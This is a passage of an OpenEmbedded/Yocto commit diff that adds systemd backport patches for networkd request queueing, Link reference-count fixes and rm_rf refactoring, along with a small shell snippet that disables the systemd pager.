+ bool dhcp4_prefix_root_cannot_set_table;
++
++ OrderedSet *request_queue;
+ };
+
+ int manager_new(Manager **ret);
+diff --git a/src/network/networkd-queue.c b/src/network/networkd-queue.c
+new file mode 100644
+index 0000000000..24bb2c845d
+--- /dev/null
++++ b/src/network/networkd-queue.c
+@@ -0,0 +1,121 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++
++#include "networkd-address.h"
++#include "networkd-manager.h"
++#include "networkd-neighbor.h"
++#include "networkd-nexthop.h"
++#include "networkd-route.h"
++#include "networkd-routing-policy-rule.h"
++#include "networkd-queue.h"
++
++static void request_free_object(RequestType type, void *object) {
++ switch(type) {
++ default:
++ assert_not_reached("invalid request type.");
++ }
++}
++
++Request *request_free(Request *req) {
++ if (!req)
++ return NULL;
++
++ if (req->on_free)
++ req->on_free(req);
++ if (req->consume_object)
++ request_free_object(req->type, req->object);
++ if (req->link && req->link->manager)
++ ordered_set_remove(req->link->manager->request_queue, req);
++ link_unref(req->link);
++
++ return mfree(req);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Request*, request_free);
++
++void request_drop(Request *req) {
++ if (req->message_counter)
++ (*req->message_counter)--;
++
++ request_free(req);
++}
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret) {
++
++ _cleanup_(request_freep) Request *req = NULL;
++ int r;
++
++ assert(link);
++ assert(link->manager);
++ assert(type >= 0 && type < _REQUEST_TYPE_MAX);
++ assert(object);
++ assert(netlink_handler);
++
++ req = new(Request, 1);
++ if (!req) {
++ if (consume_object)
++ request_free_object(type, object);
++ return -ENOMEM;
++ }
++
++ *req = (Request) {
++ .link = link,
++ .type = type,
++ .object = object,
++ .consume_object = consume_object,
++ .message_counter = message_counter,
++ .netlink_handler = netlink_handler,
++ };
++
++ link_ref(link);
++
++ r = ordered_set_ensure_put(&link->manager->request_queue, NULL, req);
++ if (r < 0)
++ return r;
++
++ if (req->message_counter)
++ (*req->message_counter)++;
++
++ if (ret)
++ *ret = req;
++
++ TAKE_PTR(req);
++ return 0;
++}
++
++int manager_process_requests(sd_event_source *s, void *userdata) {
++ Manager *manager = userdata;
++ int r;
++
++ assert(manager);
++
++ for (;;) {
++ bool processed = false;
++ Request *req;
++ Iterator i;
++ ORDERED_SET_FOREACH(req, manager->request_queue, i) {
++ switch(req->type) {
++ default:
++ return -EINVAL;
++ }
++ if (r < 0)
++ link_enter_failed(req->link);
++ if (r > 0) {
++ ordered_set_remove(manager->request_queue, req);
++ request_free(req);
++ processed = true;
++ }
++ }
++
++ if (!processed)
++ break;
++ }
++
++ return 0;
++}
+diff --git a/src/network/networkd-queue.h b/src/network/networkd-queue.h
+new file mode 100644
+index 0000000000..4558ae548f
+--- /dev/null
++++ b/src/network/networkd-queue.h
+@@ -0,0 +1,42 @@
++/* SPDX-License-Identifier: LGPL-2.1-or-later */
++#pragma once
++
++#include "sd-event.h"
++
++#include "networkd-link.h"
++
++typedef struct Request Request;
++
++typedef int (*request_after_configure_handler_t)(Request*, void*);
++typedef void (*request_on_free_handler_t)(Request*);
++
++typedef enum RequestType {
++ _REQUEST_TYPE_MAX,
++ _REQUEST_TYPE_INVALID = -EINVAL,
++} RequestType;
++
++typedef struct Request {
++ Link *link;
++ RequestType type;
++ bool consume_object;
++ void *object;
++ void *userdata;
++ unsigned *message_counter;
++ link_netlink_message_handler_t netlink_handler;
++ request_after_configure_handler_t after_configure;
++ request_on_free_handler_t on_free;
++} Request;
++
++Request *request_free(Request *req);
++void request_drop(Request *req);
++
++int link_queue_request(
++ Link *link,
++ RequestType type,
++ void *object,
++ bool consume_object,
++ unsigned *message_counter,
++ link_netlink_message_handler_t netlink_handler,
++ Request **ret);
++
++int manager_process_requests(sd_event_source *s, void *userdata);
diff --git a/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
new file mode 100644
index 0000000000..4c402e7e55
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-also-drop-requests-when-link-enters-linger-state.patch
@@ -0,0 +1,50 @@
+From 56001f023305ea99329e27141d6e6067596491a9 Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:32:57 +0900
+Subject: [PATCH] network: also drop requests when link enters linger state
+
+Otherwise, if the link is removed, several references to the link remain
+in pending requests.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/56001f023305ea99329e27141d6e6067596491a9]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 24 +++++++++++++-----------
+ 1 file changed, 13 insertions(+), 11 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 67d01ac44d..b56c232eca 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -1771,6 +1771,18 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
++static void link_drop_requests(Link *link) {
++ Request *req;
++ Iterator i;
++
++ assert(link);
++ assert(link->manager);
++
++ ORDERED_SET_FOREACH(req, link->manager->request_queue, i)
++ if (req->link == link)
++ request_drop(req);
++}
++
+ void link_drop(Link *link) {
+ if (!link)
+ return;
+@@ -1782,6 +1793,8 @@ void link_drop(Link *link) {
+ /* Drop all references from other links and manager. Note that async netlink calls may have
+ * references to the link, and they will be dropped when we receive replies. */
+
++ link_drop_requests(link);
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+--
+2.17.1
+
diff --git a/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
new file mode 100644
index 0000000000..a186bb4095
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-fix-Link-reference-counter-issue.patch
@@ -0,0 +1,278 @@
+From cc2d7efc5ca09a7de4bec55e80476986839a655c Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Fri, 14 May 2021 15:58:15 +0900
+Subject: [PATCH] network: fix Link reference counter issue
+
+Previously, when link_new() failed, `link_unref()` was called, so
+`Manager::links` could become dirty.
+This introduces `link_drop_or_unref()`, which will be called on
+failure.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/cc2d7efc5ca09a7de4bec55e80476986839a655c]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 240 ++++++++++++++++++------------------
+ 1 file changed, 122 insertions(+), 118 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index b56c232eca..d493afda4c 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -540,109 +540,6 @@ static int link_update_flags(Link *link,
+ return 0;
+ }
+
+-static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
+- _cleanup_(link_unrefp) Link *link = NULL;
+- uint16_t type;
+- const char *ifname, *kind = NULL;
+- int r, ifindex;
+- unsigned short iftype;
+-
+- assert(manager);
+- assert(message);
+- assert(ret);
+-
+- /* check for link kind */
+- r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
+- if (r == 0) {
+- (void) sd_netlink_message_read_string(message, IFLA_INFO_KIND, &kind);
+- r = sd_netlink_message_exit_container(message);
+- if (r < 0)
+- return r;
+- }
+-
+- r = sd_netlink_message_get_type(message, &type);
+- if (r < 0)
+- return r;
+- else if (type != RTM_NEWLINK)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
+- if (r < 0)
+- return r;
+- else if (ifindex <= 0)
+- return -EINVAL;
+-
+- r = sd_rtnl_message_link_get_type(message, &iftype);
+- if (r < 0)
+- return r;
+-
+- r = sd_netlink_message_read_string(message, IFLA_IFNAME, &ifname);
+- if (r < 0)
+- return r;
+-
+- link = new(Link, 1);
+- if (!link)
+- return -ENOMEM;
+-
+- *link = (Link) {
+- .n_ref = 1,
+- .manager = manager,
+- .state = LINK_STATE_PENDING,
+- .ifindex = ifindex,
+- .iftype = iftype,
+-
+- .n_dns = (unsigned) -1,
+- .dns_default_route = -1,
+- .llmnr = _RESOLVE_SUPPORT_INVALID,
+- .mdns = _RESOLVE_SUPPORT_INVALID,
+- .dnssec_mode = _DNSSEC_MODE_INVALID,
+- .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
+- };
+-
+- link->ifname = strdup(ifname);
+- if (!link->ifname)
+- return -ENOMEM;
+-
+- if (kind) {
+- link->kind = strdup(kind);
+- if (!link->kind)
+- return -ENOMEM;
+- }
+-
+- r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t *)&link->master_ifindex);
+- if (r < 0)
+- log_link_debug_errno(link, r, "New device has no master, continuing without");
+-
+- r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
+- if (r < 0)
+- log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
+-
+- if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
+- return -ENOMEM;
+-
+- r = hashmap_ensure_allocated(&manager->links, NULL);
+- if (r < 0)
+- return r;
+-
+- r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
+- if (r < 0)
+- return r;
+-
+- r = link_update_flags(link, message, false);
+- if (r < 0)
+- return r;
+-
+- *ret = TAKE_PTR(link);
+-
+- return 0;
+-}
+-
+ void link_ntp_settings_clear(Link *link) {
+ link->ntp = strv_free(link->ntp);
+ }
+@@ -2030,9 +1927,9 @@ static void link_drop_requests(Link *lin
+ request_drop(req);
+ }
+
+-void link_drop(Link *link) {
++Link *link_drop(Link *link) {
+ if (!link)
+- return;
++ return NULL;
+
+ assert(link->manager);
+
+@@ -2057,7 +1954,7 @@ void link_drop(Link *link) {
+
+ /* The following must be called at last. */
+ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
++ return link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
+@@ -3295,6 +3192,112 @@ ipv4ll_address_fail:
+
+ return 0;
+ }
++
++static Link *link_drop_or_unref(Link *link) {
++ if (!link)
++ return NULL;
++ if (!link->manager)
++ return link_unref(link);
++ return link_drop(link);
++}
++
++DEFINE_TRIVIAL_CLEANUP_FUNC(Link*, link_drop_or_unref);
++
++static int link_new(Manager *manager, sd_netlink_message *message, Link **ret) {
++ _cleanup_(link_drop_or_unrefp) Link *link = NULL;
++ uint16_t type;
++ _cleanup_free_ char *ifname = NULL, *kind = NULL;
++ int r, ifindex;
++ unsigned short iftype;
++
++ assert(manager);
++ assert(message);
++ assert(ret);
++
++ r = sd_netlink_message_get_type(message, &type);
++ if (r < 0)
++ return r;
++ else if (type != RTM_NEWLINK)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_ifindex(message, &ifindex);
++ if (r < 0)
++ return r;
++ else if (ifindex <= 0)
++ return -EINVAL;
++
++ r = sd_rtnl_message_link_get_type(message, &iftype);
++ if (r < 0)
++ return r;
++
++ r = sd_netlink_message_read_string_strdup(message, IFLA_IFNAME, &ifname);
++ if (r < 0)
++ return r;
++
++ /* check for link kind */
++ r = sd_netlink_message_enter_container(message, IFLA_LINKINFO);
++ if (r >= 0) {
++ (void) sd_netlink_message_read_string_strdup(message, IFLA_INFO_KIND, &kind);
++ r = sd_netlink_message_exit_container(message);
++ if (r < 0)
++ return r;
++ }
++
++ link = new(Link, 1);
++ if (!link)
++ return -ENOMEM;
++
++ *link = (Link) {
++ .n_ref = 1,
++ .state = LINK_STATE_PENDING,
++ .ifindex = ifindex,
++ .iftype = iftype,
++ .ifname = TAKE_PTR(ifname),
++ .kind = TAKE_PTR(kind),
++
++ .n_dns = (unsigned) -1,
++ .dns_default_route = -1,
++ .llmnr = _RESOLVE_SUPPORT_INVALID,
++ .mdns = _RESOLVE_SUPPORT_INVALID,
++ .dnssec_mode = _DNSSEC_MODE_INVALID,
++ .dns_over_tls_mode = _DNS_OVER_TLS_MODE_INVALID,
++ };
++
++ r = hashmap_ensure_allocated(&manager->links, NULL);
++ if (r < 0)
++ return r;
++
++ r = hashmap_put(manager->links, INT_TO_PTR(link->ifindex), link);
++ if (r < 0)
++ return r;
++
++ link->manager = manager;
++
++ r = sd_netlink_message_read_u32(message, IFLA_MASTER, (uint32_t*) &link->master_ifindex);
++ if (r < 0)
++ log_link_debug_errno(link, r, "New device has no master, continuing without");
++
++ r = sd_netlink_message_read_ether_addr(message, IFLA_ADDRESS, &link->mac);
++ if (r < 0)
++ log_link_debug_errno(link, r, "MAC address not found for new device, continuing without");
++
++ if (asprintf(&link->state_file, "/run/systemd/netif/links/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lease_file, "/run/systemd/netif/leases/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ if (asprintf(&link->lldp_file, "/run/systemd/netif/lldp/%d", link->ifindex) < 0)
++ return -ENOMEM;
++
++ r = link_update_flags(link, message, false);
++ if (r < 0)
++ return r;
++
++ *ret = TAKE_PTR(link);
++
++ return 0;
++}
+
+ int link_add(Manager *m, sd_netlink_message *message, Link **ret) {
+ _cleanup_(sd_device_unrefp) sd_device *device = NULL;
+
+--- a/src/network/networkd-link.h 2021-09-02 18:04:16.900542857 +0530
++++ b/src/network/networkd-link.h 2021-09-02 18:18:56.776571563 +0530
+@@ -175,7 +175,7 @@ DEFINE_TRIVIAL_DESTRUCTOR(link_netlink_d
+
+ int link_get(Manager *m, int ifindex, Link **ret);
+ int link_add(Manager *manager, sd_netlink_message *message, Link **ret);
+-void link_drop(Link *link);
++Link *link_drop(Link *link);
+
+ int link_down(Link *link, link_netlink_message_handler_t callback);
+
+
diff --git a/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
new file mode 100644
index 0000000000..65bdc611df
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/network-merge-link_drop-and-link_detach_from_manager.patch
@@ -0,0 +1,67 @@
+From 63130eb36dc51e4fd50716c585f98ebe456ca7cf Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Mon, 17 May 2021 15:40:15 +0900
+Subject: [PATCH] network: merge link_drop() and link_detach_from_manager()
+
+link_detach_from_manager() is only called by link_drop(). It is not
+necessary to split out such a tiny function.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd-stable/commit/63130eb36dc51e4fd50716c585f98ebe456ca7cf]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/network/networkd-link.c | 27 ++++++++++++---------------
+ 1 file changed, 12 insertions(+), 15 deletions(-)
+
+diff --git a/src/network/networkd-link.c b/src/network/networkd-link.c
+index 9d30e16b0a..67d01ac44d 100644
+--- a/src/network/networkd-link.c
++++ b/src/network/networkd-link.c
+@@ -2019,24 +2019,17 @@ static void link_drop_from_master(Link *link, NetDev *netdev) {
+ link_unref(set_remove(master->slaves, link));
+ }
+
+-static void link_detach_from_manager(Link *link) {
+- if (!link || !link->manager)
+- return;
+-
+- link_unref(set_remove(link->manager->links_requesting_uuid, link));
+- link_clean(link);
+-
+- /* The following must be called at last. */
+- assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
+- link_unref(link);
+-}
+-
+ void link_drop(Link *link) {
+- if (!link || link->state == LINK_STATE_LINGER)
++ if (!link)
+ return;
+
++ assert(link->manager);
++
+ link_set_state(link, LINK_STATE_LINGER);
+
++ /* Drop all references from other links and manager. Note that async netlink calls may have
++ * references to the link, and they will be dropped when we receive replies. */
++
+ link_free_carrier_maps(link);
+
+ if (link->network) {
+@@ -2044,10 +2037,14 @@ void link_drop(Link *link) {
+ link_drop_from_master(link, link->network->bond);
+ }
+
+- log_link_debug(link, "Link removed");
++ link_unref(set_remove(link->manager->links_requesting_uuid, link));
+
+ (void) unlink(link->state_file);
+- link_detach_from_manager(link);
++ link_clean(link);
++
++ /* The following must be called at last. */
++ assert_se(hashmap_remove(link->manager->links, INT_TO_PTR(link->ifindex)) == link);
++ link_unref(link);
+ }
+
+ static int link_joined(Link *link) {
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
new file mode 100644
index 0000000000..b860da008c
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-optionally-fsync-after-removing-directory-tree.patch
@@ -0,0 +1,35 @@
+Backport of the following upstream commit:
+From bdfe7ada0d4d66e6d6e65f2822acbb1ec230f9c2 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 5 Oct 2021 10:32:56 +0200
+Subject: [PATCH] rm-rf: optionally fsync() after removing directory tree
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 3 +++
+ src/basic/rm-rf.h | 1 +
+ 2 files changed, 4 insertions(+)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -161,6 +161,9 @@
+ ret = r;
+ }
+
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
++ ret = -errno;
++
+ return ret;
+ }
+
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -11,6 +11,7 @@
+ REMOVE_PHYSICAL = 1 << 2, /* If not set, only removes files on tmpfs, never physical file systems */
+ REMOVE_SUBVOLUME = 1 << 3, /* Drop btrfs subvolumes in the tree too */
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
++ REMOVE_SYNCFS = 1 << 7, /* syncfs() the root of the specified directory after removing everything in it */
+ } RemoveFlags;
+
+ int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
diff --git a/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
new file mode 100644
index 0000000000..f80e6433c6
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/rm-rf-refactor-rm-rf-children-split-out-body-of-directory.patch
@@ -0,0 +1,318 @@
+Backport of the following upstream commit:
+From 96906b22417c65d70933976e0ee920c70c9113a4 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Tue, 26 Jan 2021 16:30:06 +0100
+Subject: [PATCH] rm-rf: refactor rm_rf_children(), split out body of directory
+ iteration loop
+
+This splits out rm_rf_children_inner() as body of the loop. We can use
+that to implement rm_rf_child() for deleting one specific entry in a
+directory.
+
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 223 ++++++++++++++++++++++++++-------------------
+ src/basic/rm-rf.h | 3 +-
+ 2 files changed, 131 insertions(+), 95 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -19,138 +19,153 @@
+ #include "stat-util.h"
+ #include "string-util.h"
+
++/* We treat tmpfs/ramfs + cgroupfs as non-physical file systems. cgroupfs is similar to tmpfs in a way after
++ * all: we can create arbitrary directory hierarchies in it, and hence can also use rm_rf() on it to remove
++ * those again. */
+ static bool is_physical_fs(const struct statfs *sfs) {
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev) {
++static int rm_rf_children_inner(
++ int fd,
++ const char *fname,
++ int is_dir,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
++ struct stat st;
++ int r;
++
++ assert(fd >= 0);
++ assert(fname);
++
++ if (is_dir < 0 || (is_dir > 0 && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
++
++ r = fstatat(fd, fname, &st, AT_SYMLINK_NOFOLLOW);
++ if (r < 0)
++ return r;
++
++ is_dir = S_ISDIR(st.st_mode);
++ }
++
++ if (is_dir) {
++ _cleanup_close_ int subdir_fd = -1;
++ int q;
++
++ /* if root_dev is set, remove subdirectories only if device is same */
++ if (root_dev && st.st_dev != root_dev->st_dev)
++ return 0;
++
++ /* Stop at mount points */
++ r = fd_is_mount_point(fd, fname, 0);
++ if (r < 0)
++ return r;
++ if (r > 0)
++ return 0;
++
++ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
++
++ /* This could be a subvolume, try to remove it */
++
++ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
++ if (r < 0) {
++ if (!IN_SET(r, -ENOTTY, -EINVAL))
++ return r;
++
++ /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
++ } else
++ /* It was a subvolume, done. */
++ return 1;
++ }
++
++ subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (subdir_fd < 0)
++ return -errno;
++
++ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
++ * again for each directory */
++ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++
++ r = unlinkat(fd, fname, AT_REMOVEDIR);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++
++ return 1;
++
++ } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
++ r = unlinkat(fd, fname, 0);
++ if (r < 0)
++ return r;
++
++ return 1;
++ }
++
++ return 0;
++}
++
++int rm_rf_children(
++ int fd,
++ RemoveFlags flags,
++ const struct stat *root_dev) {
++
+ _cleanup_closedir_ DIR *d = NULL;
+ struct dirent *de;
+ int ret = 0, r;
+- struct statfs sfs;
+
+ assert(fd >= 0);
+
+ /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure.. */
++ * fd, in all cases, including on failure. */
++
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
+
+ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
+
+- r = fstatfs(fd, &sfs);
+- if (r < 0) {
+- safe_close(fd);
++ if (fstatfs(dirfd(d), &sfs) < 0)
+ return -errno;
+ }
+
+ if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call,
+- * unless explicitly requested. This is extra paranoia just
+- * to be sure we never ever remove non-state data. */
++ /* We refuse to clean physical file systems with this call, unless explicitly
++ * requested. This is extra paranoia just to be sure we never ever remove non-state
++ * data. */
++
+ _cleanup_free_ char *path = NULL;
+
+ (void) fd_get_path(fd, &path);
+- log_error("Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+-
+- safe_close(fd);
+- return -EPERM;
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
+ }
+ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return errno == ENOENT ? 0 : -errno;
+- }
+-
+ FOREACH_DIRENT_ALL(de, d, return -errno) {
+- bool is_dir;
+- struct stat st;
++ int is_dir;
+
+ if (dot_or_dot_dot(de->d_name))
+ continue;
+
+- if (de->d_type == DT_UNKNOWN ||
+- (de->d_type == DT_DIR && (root_dev || (flags & REMOVE_SUBVOLUME)))) {
+- if (fstatat(fd, de->d_name, &st, AT_SYMLINK_NOFOLLOW) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- is_dir = S_ISDIR(st.st_mode);
+- } else
+- is_dir = de->d_type == DT_DIR;
+-
+- if (is_dir) {
+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
+- if (root_dev && st.st_dev != root_dev->st_dev)
+- continue;
+-
+- subdir_fd = openat(fd, de->d_name, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (subdir_fd < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- continue;
+- }
+-
+- /* Stop at mount points */
+- r = fd_is_mount_point(fd, de->d_name, 0);
+- if (r < 0) {
+- if (ret == 0 && r != -ENOENT)
+- ret = r;
+-
+- continue;
+- }
+- if (r > 0)
+- continue;
+-
+- if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+- /* This could be a subvolume, try to remove it */
+-
+- r = btrfs_subvol_remove_fd(fd, de->d_name, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+- if (r < 0) {
+- if (!IN_SET(r, -ENOTTY, -EINVAL)) {
+- if (ret == 0)
+- ret = r;
+-
+- continue;
+- }
+-
+- /* ENOTTY, then it wasn't a btrfs subvolume, continue below. */
+- } else
+- /* It was a subvolume, continue. */
+- continue;
+- }
+-
+- /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file
+- * system type again for each directory */
+- r = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+- if (r < 0 && ret == 0)
+- ret = r;
+-
+- if (unlinkat(fd, de->d_name, AT_REMOVEDIR) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+-
+- if (unlinkat(fd, de->d_name, 0) < 0) {
+- if (ret == 0 && errno != ENOENT)
+- ret = -errno;
+- }
+- }
++ is_dir =
++ de->d_type == DT_UNKNOWN ? -1 :
++ de->d_type == DT_DIR;
++
++ r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
+ }
++
+ return ret;
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+ int fd, r;
+- struct statfs s;
+
+ assert(path);
+
+@@ -195,9 +210,10 @@
+ if (FLAGS_SET(flags, REMOVE_ROOT)) {
+
+ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
++
+ if (statfs(path, &s) < 0)
+ return -errno;
+-
+ if (is_physical_fs(&s))
+ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+ "Attempted to remove files from a disk file system under \"%s\", refusing.",
+@@ -225,3 +241,22 @@
+
+ return r;
+ }
++
++int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
++
++ /* Removes one specific child of the specified directory */
++
++ if (fd < 0)
++ return -EBADF;
++
++ if (!filename_is_valid(name))
++ return -EINVAL;
++
++ if ((flags & (REMOVE_ROOT|REMOVE_MISSING_OK)) != 0) /* Doesn't really make sense here, we are not supposed to remove 'fd' anyway */
++ return -EINVAL;
++
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
++ return -EINVAL;
++
++ return rm_rf_children_inner(fd, name, -1, flags, NULL);
++}
+--- a/src/basic/rm-rf.h
++++ b/src/basic/rm-rf.h
+@@ -13,7 +13,8 @@
+ REMOVE_MISSING_OK = 1 << 4, /* If the top-level directory is missing, ignore the ENOENT for it */
+ } RemoveFlags;
+
+-int rm_rf_children(int fd, RemoveFlags flags, struct stat *root_dev);
++int rm_rf_children(int fd, RemoveFlags flags, const struct stat *root_dev);
++int rm_rf_child(int fd, const char *name, RemoveFlags flags);
+ int rm_rf(const char *path, RemoveFlags flags);
+
+ /* Useful for usage with _cleanup_(), destroys a directory and frees the pointer */
diff --git a/meta/recipes-core/systemd/systemd/systemd-pager.sh b/meta/recipes-core/systemd/systemd/systemd-pager.sh
new file mode 100644
index 0000000000..86e3e0ab78
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/systemd-pager.sh
@@ -0,0 +1,7 @@
+# Systemd expects a color-capable pager, but the less provided
+# by busybox is not. This makes many interactions with systemd pretty
+# annoying. As a workaround we disable the systemd pager if less
+# is not the GNU version.
+if ! less -V > /dev/null 2>&1 ; then
+ export SYSTEMD_PAGER=
+fi
diff --git a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch b/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
deleted file mode 100644
index 27b2b60fad..0000000000
--- a/meta/recipes-core/systemd/systemd/systemd-udev-seclabel-options-crash-fix.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 0335d110afc08baf47d76b7011ce02510dfdd524 Mon Sep 17 00:00:00 2001
-From: Valery0xff <valery.chernous@gmail.com>
-Date: Wed, 11 Mar 2020 02:20:36 +0200
-Subject: [PATCH] udev: fix SECLABEL{selinux} issue (#15064)
-
-Add SECLABEL{selinux}="some value" cause udevadm crash
-systemd-udevd[x]: Worker [x] terminated by signal 11 (SEGV)
-
